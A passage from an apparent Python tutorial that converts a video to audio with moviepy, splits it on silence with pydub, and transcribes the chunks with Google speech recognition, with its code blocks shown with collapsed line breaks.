def large_audio_to_text(path): """Split audio into chunks and apply speech recognition""" # Open audio file with pydub sound = AudioSegment.from_wav(path) # Split audio where silence is 700ms or greater and get chunks chunks = split_on_silence(sound, min_silence_len=700, silence_thresh=sound.dBFS-14, keep_silence=700) # Create folder to store audio chunks folder_name = "audio-chunks" if not os.path.isdir(folder_name): os.mkdir(folder_name) whole_text = "" # Process each chunk for i, audio_chunk in enumerate(chunks, start=1): # Export chunk and save in folder chunk_filename = os.path.join(folder_name, f"chunk{i}.wav") audio_chunk.export(chunk_filename, format="wav") # Recognize chunk with sr.AudioFile(chunk_filename) as source: audio_listened = r.record(source) # Convert to text try: text = r.recognize_google(audio_listened) except sr.UnknownValueError as e: print("Error:", str(e)) else: text = f"{text.capitalize()}. " print(chunk_filename, ":", text) whole_text += text # Return text for all chunks return whole_text

Need more info? Check out the following deep dive:

👉 Recommended: Large Audio to Text? Here’s My Speech Recognition Solution in Python

Step 4: Putting It Together

Finally, we can combine our functions. First, we extract the audio from the video. Second, we chunk the audio into smaller files and recognize speech independently on each chunk using Google’s speech recognition module.

I added comments to annotate the most important parts of this code:

# Import libraries
import speech_recognition as sr
import os
from pydub import AudioSegment
from pydub.silence import split_on_silence
import moviepy.editor as mp def video_to_audio(in_path, out_path): """Convert video file to audio file""" video = mp.VideoFileClip(in_path) video.audio.write_audiofile(out_path) def large_audio_to_text(path): """Split audio into chunks and apply speech recognition""" # Open audio file with pydub sound = AudioSegment.from_wav(path) # Split audio where silence is 700ms or greater and get chunks chunks = split_on_silence(sound, min_silence_len=700, silence_thresh=sound.dBFS-14, keep_silence=700) # Create folder to store audio chunks folder_name = "audio-chunks" if not os.path.isdir(folder_name): os.mkdir(folder_name) whole_text = "" # Process each chunk for i, audio_chunk in enumerate(chunks, start=1): # Export chunk and save in folder chunk_filename = os.path.join(folder_name, f"chunk{i}.wav") audio_chunk.export(chunk_filename, format="wav") # Recognize chunk with sr.AudioFile(chunk_filename) as source: audio_listened = r.record(source) # Convert to text try: text = r.recognize_google(audio_listened) except sr.UnknownValueError as e: print("Error:", str(e)) else: text = f"{text.capitalize()}. " print(chunk_filename, ":", text) whole_text += text # Return text for all chunks return whole_text # Create a speech recognition object
r = sr.Recognizer() # Video to audio to text
video_to_audio('sample_video.mp4', 'sample_audio.wav')
result = large_audio_to_text('sample_audio.wav') # Print to shell and file
print(result)
print(result, file=open('result.txt', 'w'))

Store this code in a folder next to your video file 'sample_video.mp4' and run it. It will create an audio file 'sample_audio.wav' and chunk the audio and print the result to the shell, as well as to a file called 'result.txt'. This contains the transcription of the video file.